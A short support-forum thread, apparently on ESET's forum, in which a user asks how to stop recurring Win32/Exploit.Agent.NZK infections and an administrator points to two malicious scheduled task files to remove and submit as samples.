Jump to content

Recommended Posts

Hi ESET Team,

One of our client servers has infected by malware Win32/Exploit.Agent.NZK. ESET able to detect and clean the malware but the malware keep attacking the servers.

Please find bellow link to download the log from ESET Log Collector and output file from wmic process list

https://drive.google.com/open?id=1jU8ME89_udwQAtsLf-ZP3UgWFEO48ad8.

 

Any suggestion on how to stop this malware ?

Link to post
Share on other sites
  • Administrators

Please move the following files to a new folder, then reboot the machine. Those are two tasks that trigger powershell to download a resource from blocked URLs:

c:\windows\system32\tasks\Sync
c:\windows\system32\tasks\Winnet

Please submit the two files to samples[at]eset.com in an archive encrypted with the password "infected".

Link to post
Share on other sites
Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...